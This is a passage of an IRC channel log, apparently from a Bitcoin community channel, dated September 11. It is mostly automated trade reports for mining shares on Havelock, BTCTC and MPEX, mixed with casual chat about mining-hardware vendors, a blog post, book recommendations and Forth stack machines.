installed freenet after some years, and poking around, it's distilled there. Sep 11 19:58:38 [HAVELOCK] [CBTC] 7777 @ 0.00051 = 3.9663 BTC [-] Sep 11 19:58:41 [HAVELOCK] [CBTC] 5000 @ 0.0005 = 2.5 BTC [-] Sep 11 19:58:54 but it' googlable normally Sep 11 19:59:21 http://www.maps.org/videos/source3/video15.html Sep 11 19:59:23 James Kent-The Mechanics of HallucinationJames Kent-The Mechanics of Hallucination Sep 11 20:00:01 [HAVELOCK] [AM1] [PAID] 13.96276240 BTC to 1`030 shares, 1355608 satoshi per share Sep 11 20:00:10 [HAVELOCK] [AM100] 10 @ 0.021191 = 0.2119 BTC [-] Sep 11 20:00:26 hallucination Sep 11 20:00:34 [HAVELOCK] [AM100] [PAID] 32.29300158 BTC to 250`761 shares, 12878 satoshi per share Sep 11 20:01:06 ^^ AM tribe bonding :DDD Sep 11 20:01:36 speak of the devil! Sep 11 20:01:40 heh Sep 11 20:02:09 gotcha! Sep 11 20:02:16 [HAVELOCK] [XBOND] 1500 @ 0.001178 = 1.767 BTC [+] Sep 11 20:03:09 [HAVELOCK] [AM100] 1 @ 0.0222 BTC [+] Sep 11 20:03:11 [HAVELOCK] [AM100] 9 @ 0.0222 = 0.1998 BTC [+] Sep 11 20:03:13 [BTCTC] [CIPHERMINE.B1] 100 @ 0.01067 = 1.067 BTC [-] Sep 11 20:03:33 i heard they sleep upside-down, is this true? Sep 11 20:03:47 hm Sep 11 20:04:04 why visit BFL? Sep 11 20:04:17 royalties? Sep 11 20:04:27 haha Sep 11 20:04:55 [HAVELOCK] [CBTC] 26 @ 0.0005 = 0.013 BTC [-] Sep 11 20:05:30 [HAVELOCK] [AM100] 1 @ 0.0222 BTC [+] Sep 11 20:05:41 i lel'd heavily at avalon Sep 11 20:06:34 [BTCTC] [DMS.MINING] 4 @ 0.002599 = 0.0104 BTC [+] Sep 11 20:07:07 [HAVELOCK] [AM1] 3 @ 2.29 = 6.87 BTC [+] Sep 11 20:07:17 [BTCTC] [LABCOIN] 34 @ 0.003603 = 0.1225 BTC [-] Sep 11 20:07:18 [BTCTC] [LABCOIN] 5 @ 0.003602 = 0.018 BTC [-] Sep 11 20:07:19 [BTCTC] [LABCOIN] 98 @ 0.0036 = 0.3528 BTC [-] Sep 11 20:07:20 [BTCTC] [LABCOIN] 33 @ 0.003596 = 0.1187 BTC [-] Sep 11 20:07:21 [BTCTC] [LABCOIN] 100 @ 0.003595 = 0.3595 BTC [-] Sep 11 20:07:21 [BTCTC] [LABCOIN] 17 @ 0.003591 = 0.061 BTC [-] Sep 11 20:07:22 [BTCTC] [LABCOIN] 5 @ 0.00359 = 0.018 BTC [-] Sep 11 20:07:23 [BTCTC] [LABCOIN] 47 @ 0.00359 = 0.1687 BTC [-] Sep 11 20:07:24 [BTCTC] [LABCOIN] 161 @ 0.003571 = 0.5749 BTC [-] Sep 11 20:07:24 yeah, it's not funny at all for people who lost money Sep 11 20:07:25 [HAVELOCK] [XBOND] 9 @ 0.001188 = 0.0107 BTC [+] Sep 11 20:08:11 [HAVELOCK] [AM100] 5 @ 0.02221 = 0.1111 BTC [+] Sep 11 20:08:24 "this isn't good for my chi" Sep 11 20:09:40 [BTCTC] [DMS.PURCHASE] 875 @ 0.012 = 10.5 BTC [-] Sep 11 20:09:44 [HAVELOCK] [AM100] 5 @ 0.02221 = 0.1111 BTC [+] Sep 11 20:09:47 chaang-noi: future Sep 11 20:09:49 chaang-noi: read. Sep 11 20:10:29 chaang-noi: http://log.bitcoin-assets.com/#302998 Sep 11 20:10:37 i know man. i know. it's fine. Sep 11 20:11:17 [BTCTC] [ASICMINER-PT] 1 @ 2.226 BTC [-] Sep 11 20:11:17 "Klye you have a gambling problem. Whenever people have given you a BTC or two for your "projects" you end up gambling them on Just-Dice. You need to get your shit together with gambling before you consider putting peoples' monies at risk as well." Sep 11 20:11:18 [BTCTC] [ASICMINER-PT] 1 @ 2.225 BTC [-] Sep 11 20:11:26 https://bitcointalk.org/index.php?topic=292465.msg3130538#msg3130538 Sep 11 20:11:28 TAT: I was just going to post that Sep 11 20:11:29 KLYEMINED Project Sep 11 20:11:35 FF! Sep 11 20:12:01 this is obviously an indicator of quality. Sep 11 20:12:34 [BTCTC] [DMS.MINING] 1 @ 0.002599 BTC [+] Sep 11 20:13:26 [BTCTC] [LABCOIN] 55 @ 0.003667 = 0.2017 BTC [+] Sep 11 20:13:48 [BTCTC] [DMS.MINING] 7 @ 0.002599 = 0.0182 BTC [+] Sep 11 20:15:16 [HAVELOCK] [CBTC] 5 @ 0.00053 = 0.0027 BTC [+] Sep 11 20:15:55 already had him ignored for being an inactiveminer Sep 11 20:16:36 [HAVELOCK] [AM100] 25 @ 0.022 = 0.55 BTC [-] Sep 11 20:17:00 chaang-noi: what was the failure rate on your chips? Sep 11 20:21:20 who were the people doing the bitcoin police thing ? Sep 11 20:21:27 [HAVELOCK] [CFIG] 1 @ 0.134625 BTC [+] Sep 11 20:21:36 lel Sep 11 20:21:43 BTC COPS Sep 11 20:22:49 neofutur Sep 11 20:23:16 er, ne0futur Sep 11 20:23:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.02125 BTC [-] Sep 11 20:23:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.02125 = 0.0425 BTC [-] Sep 11 20:23:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.02124 = 0.2124 BTC [-] Sep 11 20:23:37 [BTCTC] [TAT.ASICMINER] 4 @ 0.02114 = 0.0846 BTC [-] Sep 11 20:23:38 [BTCTC] [TAT.ASICMINER] 20 @ 0.02113 = 0.4226 BTC [-] Sep 11 20:23:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.0211 = 0.0844 BTC [-] Sep 11 20:23:41 [BTCTC] [TAT.ASICMINER] 9 @ 0.02101 = 0.1891 BTC [-] Sep 11 20:23:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.02101 BTC [-] Sep 11 20:23:43 [BTCTC] [TAT.ASICMINER] 16 @ 0.021 = 0.336 BTC [-] Sep 11 20:23:43 [BTCTC] [TAT.ASICMINER] 30 @ 0.021 = 0.63 BTC [-] Sep 11 20:23:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.021 BTC [-] Sep 11 20:23:45 [BTCTC] [TAT.ASICMINER] 13 @ 0.02092 = 0.272 BTC [-] Sep 11 20:24:05 [BTCTC] [ASICMINER-PT] 1 @ 2.309 BTC [+] Sep 11 20:25:54 [HAVELOCK] [CBTC] 1097 @ 0.0005 = 0.5485 BTC [-] Sep 11 20:27:07 [HAVELOCK] [XBOND] 5 @ 0.001151 = 0.0058 BTC [-] Sep 11 20:27:24 [HAVELOCK] [CFIG] 4 @ 0.134625 = 0.5385 BTC [+] Sep 11 20:28:03 [HAVELOCK] [AM100] 4 @ 0.02199 = 0.088 BTC [-] Sep 11 20:28:38 [HAVELOCK] [HIM] 1 @ 0.14 BTC [+] Sep 11 20:30:26 [HAVELOCK] [HIM] 1 @ 0.139 BTC [-] Sep 11 20:30:33 [HAVELOCK] [HIM] 1 @ 0.138 BTC [-] Sep 11 20:30:39 [HAVELOCK] [HIM] 1 @ 0.137 BTC [-] Sep 11 20:30:47 [HAVELOCK] [HIM] 1 @ 0.136 BTC [-] Sep 11 20:30:53 [HAVELOCK] [HIM] 1 @ 0.135 BTC [-] Sep 11 20:31:01 [HAVELOCK] [HIM] 1 @ 0.134 BTC [-] Sep 11 20:31:11 [HAVELOCK] [HIM] 2 @ 0.133 = 0.266 BTC [-] Sep 11 20:31:32 [HAVELOCK] [CFIG] 8 @ 0.134625 = 1.077 BTC [+] Sep 11 20:31:57 [HAVELOCK] [XBOND] 4 @ 0.001151 = 0.0046 BTC [-] Sep 11 20:32:07 [HAVELOCK] [XBOND] 26 @ 0.00115001 = 0.0299 BTC [-] Sep 11 20:32:21 [HAVELOCK] [XBOND] 120 @ 0.00115 = 0.138 BTC [-] Sep 11 20:32:30 [HAVELOCK] [XBOND] 22 @ 0.001129 = 0.0248 BTC [-] Sep 11 20:32:37 [HAVELOCK] [XBOND] 3 @ 0.00112525 = 0.0034 BTC [-] Sep 11 20:32:42 [HAVELOCK] [XBOND] 1 @ 0.00112503 BTC [-] Sep 11 20:32:49 [HAVELOCK] [XBOND] 129 @ 0.001125 = 0.1451 BTC [-] Sep 11 20:32:54 [HAVELOCK] [XBOND] 100 @ 0.0011242 = 0.1124 BTC [-] Sep 11 20:33:00 [HAVELOCK] [XBOND] 20 @ 0.001121 = 0.0224 BTC [-] Sep 11 20:33:06 [HAVELOCK] [XBOND] 15 @ 0.00112001 = 0.0168 BTC [-] Sep 11 20:33:13 [HAVELOCK] [XBOND] 20 @ 0.001112 = 0.0222 BTC [-] Sep 11 20:33:19 [HAVELOCK] [XBOND] 10 @ 0.0011111 = 0.0111 BTC [-] Sep 11 20:33:28 [HAVELOCK] [XBOND] 20 @ 0.001101 = 0.022 BTC [-] Sep 11 20:33:33 [HAVELOCK] [XBOND] 250 @ 0.00110003 = 0.275 BTC [-] Sep 11 20:33:40 [HAVELOCK] [XBOND] 100 @ 0.00110002 = 0.11 BTC [-] Sep 11 20:33:45 [HAVELOCK] [XBOND] 140 @ 0.00110001 = 0.154 BTC [-] Sep 11 20:33:54 [HAVELOCK] [XBOND] 2000 @ 0.0011 = 2.2 BTC [-] Sep 11 20:34:10 [HAVELOCK] [CBTC] 10 @ 0.00048 = 0.0048 BTC [-] Sep 11 20:34:13 [HAVELOCK] [CFIG] 10 @ 0.134625 = 1.3463 BTC [+] Sep 11 20:34:51 [HAVELOCK] [AM100] 6 @ 0.02199 = 0.1319 BTC [-] Sep 11 20:35:00 [HAVELOCK] [CBTC] 10 @ 0.00045 = 0.0045 BTC [-] Sep 11 20:35:07 [HAVELOCK] [CBTC] 7 @ 0.00045 = 0.0032 BTC [-] Sep 11 20:35:14 [HAVELOCK] [CBTC] 1200 @ 0.00043 = 0.516 BTC [-] Sep 11 20:35:45 [HAVELOCK] [XBOND] 8 @ 0.001179 = 0.0094 BTC [+] Sep 11 20:35:55 [BTCTC] [ACTIVEMINING] 95 @ 0.003418 = 0.3247 BTC [-] Sep 11 20:35:56 [BTCTC] [ACTIVEMINING] 382 @ 0.003417 = 1.3053 BTC [-] Sep 11 20:35:57 [BTCTC] [ACTIVEMINING] 487 @ 0.003401 = 1.6563 BTC [-] Sep 11 20:35:58 [BTCTC] [ACTIVEMINING] 1692 @ 0.0034 = 5.7528 BTC [-] Sep 11 20:37:11 [BTCTC] [LABCOIN] 33 @ 0.003571 = 0.1178 BTC [-] Sep 11 20:37:12 [BTCTC] [LABCOIN] 100 @ 0.00357 = 0.357 BTC [-] Sep 11 20:37:14 [BTCTC] [LABCOIN] 33 @ 0.003568 = 0.1177 BTC [-] Sep 11 20:37:15 [BTCTC] [LABCOIN] 100 @ 0.003567 = 0.3567 BTC [-] Sep 11 20:37:16 [BTCTC] [LABCOIN] 191 @ 0.003557 = 0.6794 BTC [-] Sep 11 20:37:17 [BTCTC] [LABCOIN] 574 @ 0.003556 = 2.0411 BTC [-] Sep 11 20:37:18 [BTCTC] [CIPHERMINE.B1] 90 @ 0.01066 = 0.9594 BTC [-] Sep 11 20:37:19 [BTCTC] [CIPHERMINE.B1] 50 @ 0.01067 = 0.5335 BTC [+] Sep 11 20:37:20 [BTCTC] [LABCOIN] 93 @ 0.003551 = 0.3302 BTC [-] Sep 11 20:37:20 [BTCTC] [LABCOIN] 280 @ 0.00355 = 0.994 BTC [-] Sep 11 20:37:22 [BTCTC] [LABCOIN] 33 @ 0.00353 = 0.1165 BTC [-] Sep 11 20:37:23 [BTCTC] [LABCOIN] 100 @ 0.003529 = 0.3529 BTC [-] Sep 11 20:37:24 [BTCTC] [LABCOIN] 205 @ 0.00352 = 0.7216 BTC [-] Sep 11 20:37:25 [BTCTC] [LABCOIN] 439 @ 0.003519 = 1.5448 BTC [-] Sep 11 20:39:05 [BTCTC] [LABCOIN] 509 @ 0.003524 = 1.7937 BTC [+] Sep 11 20:39:07 [BTCTC] [LABCOIN] 228 @ 0.003522 = 0.803 BTC [-] Sep 11 20:39:08 [BTCTC] [LABCOIN] 176 @ 0.003519 = 0.6193 BTC [-] Sep 11 20:39:09 [BTCTC] [LABCOIN] 86 @ 0.003511 = 0.3019 BTC [-] Sep 11 20:39:10 [BTCTC] [LABCOIN] 260 @ 0.00351 = 0.9126 BTC [-] Sep 11 20:39:12 [BTCTC] [LABCOIN] 690 @ 0.003509 = 2.4212 BTC [-] Sep 11 20:39:12 [BTCTC] [LABCOIN] 831 @ 0.003508 = 2.9151 BTC [-] Sep 11 20:40:04 avalon simply did not fill your order? Sep 11 20:40:04 [HAVELOCK] [XBOND] 14 @ 0.001179 = 0.0165 BTC [+] Sep 11 20:42:53 [BTCTC] [ASICMINER-PT] 1 @ 2.225 BTC [-] Sep 11 20:42:55 [BTCTC] [ASICMINER-PT] 1 @ 2.225 BTC [-] Sep 11 20:42:56 [BTCTC] [ASICMINER-PT] 1 @ 2.224 BTC [-] Sep 11 20:42:57 [BTCTC] [ASICMINER-PT] 1 @ 2.223 BTC [-] Sep 11 20:43:03 [MPEX] [S.MPOE] 7200 @ 0.00089259 = 6.4266 BTC [+] Sep 11 20:43:14 [BTCTC] [CIPHERMINE.B1] 133 @ 0.01067 = 1.4191 BTC [+] Sep 11 20:43:30 [BTCTC] [DMS.MINING] 9 @ 0.002599 = 0.0234 BTC [+] Sep 11 20:43:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.02094 = 0.0419 BTC [+] Sep 11 20:43:46 [BTCTC] [TAT.ASICMINER] 6 @ 0.02217 = 0.133 BTC [+] Sep 11 20:44:05 [HAVELOCK] [AM100] 7 @ 0.02199 = 0.1539 BTC [-] Sep 11 20:45:10 [BTCTC] [ACTIVEMINING] 64 @ 0.003401 = 0.2177 BTC [+] Sep 11 20:45:17 how much was that? Sep 11 20:46:10 [BTCTC] [ACTIVEMINING] 64 @ 0.003401 = 0.2177 BTC [+] Sep 11 20:46:12 [BTCTC] [ACTIVEMINING] 52 @ 0.0034 = 0.1768 BTC [-] Sep 11 20:46:14 [HAVELOCK] [SDSTM] 1 @ 0.003 BTC [+] Sep 11 20:48:33 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000631 BTC [+] Sep 11 20:51:16 http://trilema.com/2013/one-hundred-years-of-bitcoin-finance/ Sep 11 20:51:18 comments welcome. Sep 11 20:51:19 One hundred years of Bitcoin finance pe Trilema - Un blog de Mircea Popescu. Sep 11 20:51:19 [BTCTC] [DMS.MINING] 1 @ 0.002551 BTC [-] Sep 11 20:52:41 [BTCTC] [LABCOIN] 451 @ 0.003531 = 1.5925 BTC [+] Sep 11 20:53:15 [BTCTC] [LABCOIN] 451 @ 0.003531 = 1.5925 BTC [+] Sep 11 20:53:38 [BTCTC] [LABCOIN] 150 @ 0.003531 = 0.5297 BTC [+] Sep 11 20:54:12 [BTCTC] [LABCOIN] 331 @ 0.003534 = 1.1698 BTC [+] Sep 11 20:54:14 [BTCTC] [LABCOIN] 68 @ 0.003532 = 0.2402 BTC [-] Sep 11 20:54:16 supply chain management Sep 11 20:54:20 risk management Sep 11 20:54:35 these are things with which one should be acquainted before diving into the hardware business, methinks. Sep 11 20:54:45 ;;calc 800*130 Sep 11 20:54:45 104000 Sep 11 20:54:52 [BTCTC] [LABCOIN] 15 @ 0.003532 = 0.053 BTC [-] Sep 11 20:54:54 ;;calc 800*130 - 25000 Sep 11 20:54:55 79000 Sep 11 20:55:10 mean reversion. Sep 11 20:56:39 [HAVELOCK] [XBOND] 5 @ 0.001175 = 0.0059 BTC [-] Sep 11 20:59:14 mircea_popescu: lol welfare checks and video lottery terminals Sep 11 20:59:35 it made it in! Sep 11 21:00:37 [BTCTC] [LABCOIN] 60 @ 0.003615 = 0.2169 BTC [+] Sep 11 21:01:03 [HAVELOCK] [XBOND] 10 @ 0.001175 = 0.0118 BTC [-] Sep 11 21:02:03 mircea_popescu: nice article and an enjoyable read. Curious about your reading inclinations. Other than the occasional movie you mention, what book inspired you to read more? Sep 11 21:04:43 [HAVELOCK] [XBOND] 5 @ 0.001175 = 0.0059 BTC [-] Sep 11 21:06:48 mircea_popescu: i want a list of what you consider literature essentials Sep 11 21:06:48 bitesak any non-socialist before 1950 or so. gibbon. twain. kuhn. russel. bacon. voltaire. swift. Sep 11 21:06:59 take your pick, we certainly have enough good books Sep 11 21:07:01 bahahaha Sep 11 21:08:20 pretty much all the germans, once one's old enough. frege. husserls. kant. heidegger Sep 11 21:08:55 certainly all the greeks, most of the latins, you'll never run out. Sep 11 21:09:27 bashevis singer just to include a jew. Sep 11 21:13:19 [BTCTC] [LABCOIN] 5 @ 0.00353 = 0.0177 BTC [-] Sep 11 21:14:18 [HAVELOCK] [AM100] 2 @ 0.021936 = 0.0439 BTC [-] Sep 11 21:14:21 [BTCTC] [LABCOIN] 6 @ 0.003525 = 0.0212 BTC [-] Sep 11 21:14:50 [HAVELOCK] [AM100] 1 @ 0.021936 BTC [-] Sep 11 21:15:43 [HAVELOCK] [AM100] 11 @ 0.021936 = 0.2413 BTC [-] Sep 11 21:19:37 thanks, been wanting to ask you that. my humble encouragement to you to continue writing ! it's quite pertinent sometimes :) Sep 11 21:20:29 well you know how it is, Sep 11 21:20:37 if you write enough upon occasion it has to be. Sep 11 21:23:01 [BTCTC] [LABCOIN] 300 @ 0.00352 = 1.056 BTC [-] Sep 11 21:23:03 [BTCTC] [LABCOIN] 100 @ 0.003518 = 0.3518 BTC [-] Sep 11 21:31:18 [BTCTC] [LABCOIN] 45 @ 0.003515 = 0.1582 BTC [-] Sep 11 21:31:34 [BTCTC] [KENILWORTH] 1 @ 0.001768 BTC [-] Sep 11 21:33:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.02205 BTC [-] Sep 11 21:33:51 [BTCTC] [LABCOIN] 100 @ 0.00351 = 0.351 BTC [-] Sep 11 21:34:01 [BTCTC] [DMS.PURCHASE] 3 @ 0.012 = 0.036 BTC [-] Sep 11 21:34:04 [BTCTC] [COGNITIVE] 1 @ 0.3185 BTC [+] Sep 11 21:34:26 [BTCTC] [PETA-MINE] 1 @ 0.6599 BTC [+] Sep 11 21:34:56 [BTCTC] [DMS.MINING] 1 @ 0.0026 BTC [+] Sep 11 21:39:13 [BTCTC] [LABCOIN] 1 @ 0.003511 BTC [+] Sep 11 21:39:14 [BTCTC] [ASICMINER-PT] 3 @ 2.223 = 6.669 BTC [-] Sep 11 21:40:31 [BTCTC] [ASICMINER-PT] 4 @ 2.216 = 8.864 BTC [-] Sep 11 21:40:46 [BTCTC] [LABCOIN] 200 @ 0.003511 = 0.7022 BTC [+] Sep 11 21:40:47 [BTCTC] [LABCOIN] 100 @ 0.003512 = 0.3512 BTC [+] Sep 11 21:40:48 [BTCTC] [LABCOIN] 72 @ 0.003514 = 0.253 BTC [+] Sep 11 21:40:50 [BTCTC] [LABCOIN] 36 @ 0.003515 = 0.1265 BTC [+] Sep 11 21:41:50 [BTCTC] [LABCOIN] 600 @ 0.003518 = 2.1108 BTC [+] Sep 11 21:41:52 [BTCTC] [LABCOIN] 300 @ 0.003519 = 1.0557 BTC [+] Sep 11 21:42:41 [BTCTC] [ASICMINER-PT] 1 @ 2.215 BTC [-] Sep 11 21:45:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.022 BTC [-] Sep 11 21:48:12 [HAVELOCK] [SDSTM] 300 @ 0.00232 = 0.696 BTC [-] Sep 11 21:48:49 [HAVELOCK] [AM100] 4 @ 0.02121001 = 0.0848 BTC [-] Sep 11 21:48:54 [HAVELOCK] [AM100] 4 @ 0.02121 = 0.0848 BTC [-] Sep 11 21:49:02 [HAVELOCK] [AM100] 1 @ 0.0212 BTC [-] Sep 11 21:49:08 [HAVELOCK] [AM100] 10 @ 0.021191 = 0.2119 BTC [-] Sep 11 21:50:06 [HAVELOCK] [XBOND] 1 @ 0.001174 BTC [-] Sep 11 21:51:48 [HAVELOCK] [AM100] 85 @ 0.0212 = 1.802 BTC [+] Sep 11 21:51:51 [HAVELOCK] [AM100] 15 @ 0.02119 = 0.3179 BTC [-] Sep 11 21:52:22 [BTCTC] [BASIC-MINING] 1 @ 0.134 BTC [+] Sep 11 21:56:13 [BTCTC] [LABCOIN] 266 @ 0.003513 = 0.9345 BTC [-] Sep 11 21:56:15 [BTCTC] [LABCOIN] 95 @ 0.003511 = 0.3335 BTC [-] Sep 11 21:56:16 [BTCTC] [LABCOIN] 650 @ 0.00351 = 2.2815 BTC [-] Sep 11 21:56:17 [BTCTC] [LABCOIN] 46 @ 0.00351 = 0.1615 BTC [-] Sep 11 21:56:18 [BTCTC] [LABCOIN] 86 @ 0.003509 = 0.3018 BTC [-] Sep 11 21:56:20 [BTCTC] [LABCOIN] 750 @ 0.003509 = 2.6318 BTC [-] Sep 11 21:56:20 [BTCTC] [LABCOIN] 1219 @ 0.003508 = 4.2763 BTC [-] Sep 11 21:56:21 [BTCTC] [LABCOIN] 380 @ 0.003506 = 1.3323 BTC [-] Sep 11 21:56:22 [BTCTC] [LABCOIN] 4 @ 0.0035 = 0.014 BTC [-] Sep 11 21:56:23 [BTCTC] [LABCOIN] 1700 @ 0.003498 = 5.9466 BTC [-] Sep 11 21:56:25 [HAVELOCK] [XBOND] 1 @ 0.001174 BTC [-] Sep 11 21:58:25 [HAVELOCK] [AM100] 1 @ 0.02189 BTC [+] Sep 11 21:59:37 [BTCTC] [LABCOIN] 100 @ 0.003497 = 0.3497 BTC [-] Sep 11 22:00:39 [BTCTC] [BASIC-MINING] 2 @ 0.135 = 0.27 BTC [+] Sep 11 22:01:04 [HAVELOCK] [XBOND] 3 @ 0.00117 = 0.0035 BTC [-] Sep 11 22:01:19 [BTCTC] [BASIC-MINING] 5 @ 0.1387 = 0.6935 BTC [+] Sep 11 22:03:17 [HAVELOCK] [XBOND] 5 @ 0.00117 = 0.0059 BTC [-] Sep 11 22:04:15 [BTCTC] [BASIC-MINING] 5 @ 0.14 = 0.7 BTC [+] Sep 11 22:07:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.02198 BTC [-] Sep 11 22:08:25 [BTCTC] [ASICMINER-PT] 1 @ 2.281 BTC [+] Sep 11 22:08:26 [BTCTC] [ASICMINER-PT] 2 @ 2.282 = 4.564 BTC [+] Sep 11 22:08:27 [BTCTC] [ASICMINER-PT] 1 @ 2.283 BTC [+] Sep 11 22:08:38 [BTCTC] [ASICMINER-PT] 1 @ 2.283 BTC [+] Sep 11 22:09:05 [BTCTC] [LABCOIN] 100 @ 0.003497 = 0.3497 BTC [-] Sep 11 22:11:20 [BTCTC] [LABCOIN] 300 @ 0.003497 = 1.0491 BTC [-] Sep 11 22:11:49 [BTCTC] [LABCOIN] 300 @ 0.003494 = 1.0482 BTC [-] Sep 11 22:12:52 [HAVELOCK] [AM100] 1 @ 0.021191 BTC [-] Sep 11 22:12:55 [HAVELOCK] [AM100] 183 @ 0.02119 = 3.8778 BTC [-] Sep 11 22:12:59 [BTCTC] [LABCOIN] 100 @ 0.003494 = 0.3494 BTC [-] Sep 11 22:13:50 [HAVELOCK] [AM100] 19 @ 0.0209 = 0.3971 BTC [-] Sep 11 22:13:58 [BTCTC] [LABCOIN] 400 @ 0.003492 = 1.3968 BTC [-] Sep 11 22:14:00 [BTCTC] [LABCOIN] 110 @ 0.00349 = 0.3839 BTC [-] Sep 11 22:14:01 [BTCTC] [LABCOIN] 400 @ 0.00349 = 1.396 BTC [-] Sep 11 22:14:02 [BTCTC] [LABCOIN] 1 @ 0.003476 BTC [-] Sep 11 22:14:03 [BTCTC] [LABCOIN] 236 @ 0.003475 = 0.8201 BTC [-] Sep 11 22:14:05 [BTCTC] [LABCOIN] 216 @ 0.003474 = 0.7504 BTC [-] Sep 11 22:14:06 [BTCTC] [LABCOIN] 100 @ 0.003473 = 0.3473 BTC [-] Sep 11 22:14:07 [BTCTC] [LABCOIN] 550 @ 0.003472 = 1.9096 BTC [-] Sep 11 22:14:08 [BTCTC] [LABCOIN] 336 @ 0.003463 = 1.1636 BTC [-] Sep 11 22:14:09 [BTCTC] [LABCOIN] 200 @ 0.003463 = 0.6926 BTC [-] Sep 11 22:14:10 [BTCTC] [LABCOIN] 10 @ 0.003462 = 0.0346 BTC [-] Sep 11 22:14:10 [BTCTC] [LABCOIN] 1000 @ 0.00346 = 3.46 BTC [-] Sep 11 22:14:11 [BTCTC] [LABCOIN] 76 @ 0.003451 = 0.2623 BTC [-] Sep 11 22:14:13 [BTCTC] [LABCOIN] 230 @ 0.00345 = 0.7935 BTC [-] Sep 11 22:14:14 [BTCTC] [LABCOIN] 148 @ 0.003438 = 0.5088 BTC [-] Sep 11 22:14:15 [BTCTC] [LABCOIN] 445 @ 0.003437 = 1.5295 BTC [-] Sep 11 22:14:16 [BTCTC] [LABCOIN] 333 @ 0.00341 = 1.1355 BTC [-] Sep 11 22:14:17 [BTCTC] [LABCOIN] 1000 @ 0.003409 = 3.409 BTC [-] Sep 11 22:14:18 [BTCTC] [LABCOIN] 333 @ 0.003401 = 1.1325 BTC [-] Sep 11 22:14:19 [BTCTC] [LABCOIN] 1000 @ 0.0034 = 3.4 BTC [-] Sep 11 22:14:20 [BTCTC] [LABCOIN] 50 @ 0.003391 = 0.1696 BTC [-] Sep 11 22:14:21 [BTCTC] [LABCOIN] 152 @ 0.00339 = 0.5153 BTC [-] Sep 11 22:14:21 [BTCTC] [LABCOIN] 412 @ 0.003386 = 1.395 BTC [-] Sep 11 22:14:22 [BTCTC] [LABCOIN] 1236 @ 0.003385 = 4.1839 BTC [-] Sep 11 22:14:24 [HAVELOCK] [AM100] 18 @ 0.02080001 = 0.3744 BTC [-] Sep 11 22:14:26 [HAVELOCK] [AM100] 3 @ 0.0206 = 0.0618 BTC [-] Sep 11 22:14:28 [HAVELOCK] [AM100] 5 @ 0.02055 = 0.1028 BTC [-] Sep 11 22:14:30 [HAVELOCK] [AM100] 18 @ 0.02055 = 0.3699 BTC [-] Sep 11 22:14:32 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.0006099 = 0.0018 BTC [-] Sep 11 22:15:37 [HAVELOCK] [AM100] 12 @ 0.02055 = 0.2466 BTC [-] Sep 11 22:15:40 [BTCTC] [LABCOIN] 236 @ 0.003379 = 0.7974 BTC [-] Sep 11 22:15:45 [HAVELOCK] [AM100] 69 @ 0.0205 = 1.4145 BTC [-] Sep 11 22:19:02 [BTCTC] [LABCOIN] 182 @ 0.003385 = 0.6161 BTC [+] Sep 11 22:21:19 [BTCTC] [LABCOIN] 587 @ 0.003512 = 2.0615 BTC [+] Sep 11 22:26:38 [BTCTC] [LABCOIN] 505 @ 0.003501 = 1.768 BTC [-] Sep 11 22:27:07 [BTCTC] [LABCOIN] 505 @ 0.003501 = 1.768 BTC [-] Sep 11 22:32:16 [HAVELOCK] [HIM] 1 @ 0.139 BTC [+] Sep 11 22:32:19 [HAVELOCK] [HIM] 9 @ 0.14 = 1.26 BTC [+] Sep 11 22:33:16 [BTCTC] [LABCOIN] 364 @ 0.003492 = 1.2711 BTC [-] Sep 11 22:33:20 "You have no idea how much fun it is to just splatter named variables all over the place, use them in expressions in whatever order you want, and have the compiler schedule things. Although you do it all day. And that was pretty much the end of Forth on that machine; we wrote everything in C." Sep 11 22:33:29 this is pretty good shit lol http://www.yosefk.com/blog/my-history-with-forth-stack-machines.html Sep 11 22:33:33 [BTCTC] [DMS.MINING] 1 @ 0.002625 BTC [+] Sep 11 22:33:34 [BTCTC] [DMS.MINING] 2 @ 0.002649 = 0.0053 BTC [+] Sep 11 22:33:51 [BTCTC] [LABCOIN] 364 @ 0.003491 = 1.2707 BTC [-] Sep 11 22:35:34 [BTCTC] [LABCOIN] 1 @ 0.003489 BTC [-] Sep 11 22:38:44 [BTCTC] [LABCOIN] 1 @ 0.003402 BTC [-] Sep 11 22:40:40 [BTCTC] [LABCOIN] 333 @ 0.003403 = 1.1332 BTC [+] Sep 11 22:40:42 [BTCTC] [LABCOIN] 999 @ 0.003402 = 3.3986 BTC [-] Sep 11 22:40:43 [BTCTC] [LABCOIN] 100 @ 0.003401 = 0.3401 BTC [-] Sep 11 22:40:44 [BTCTC] [LABCOIN] 300 @ 0.0034 = 1.02 BTC [-] Sep 11 22:40:44 [BTCTC] [LABCOIN] 1 @ 0.003399 BTC [-] Sep 11 22:40:46 [BTCTC] [LABCOIN] 384 @ 0.003393 = 1.3029 BTC [-] Sep 11 22:40:47 [BTCTC] [LABCOIN] 128 @ 0.003388 = 0.4337 BTC [-] Sep 11 22:40:48 [BTCTC] [LABCOIN] 66 @ 0.00338 = 0.2231 BTC [-] Sep 11 22:40:49 [BTCTC] [LABCOIN] 200 @ 0.003379 = 0.6758 BTC [-] Sep 11 22:40:50 [BTCTC] [LABCOIN] 218 @ 0.003377 = 0.7362 BTC [-] Sep 11 22:40:51 [BTCTC] [LABCOIN] 655 @ 0.003376 = 2.2113 BTC [-] Sep 11 22:40:52 [BTCTC] [LABCOIN] 96 @ 0.003358 = 0.3224 BTC [-] Sep 11 22:40:53 [BTCTC] [LABCOIN] 90 @ 0.003357 = 0.3021 BTC [-] Sep 11 22:40:54 [BTCTC] [LABCOIN] 200 @ 0.003356 = 0.6712 BTC [-] Sep 11 22:40:55 [BTCTC] [LABCOIN] 5 @ 0.003351 = 0.0168 BTC [-] Sep 11 22:40:56 [BTCTC] [LABCOIN] 15 @ 0.00335 = 0.0503 BTC [-] Sep 11 22:47:51 [HAVELOCK] [AM1] 2 @ 2.29 = 4.58 BTC [+] Sep 11 22:52:48 well, they tried to do AES/RSA on forth multicore chip: Sep 11 22:52:50 http://www.hgi.rub.de/media/sh/veroeffentlichungen/2013/05/07/GA144_crypto.pdf Sep 11 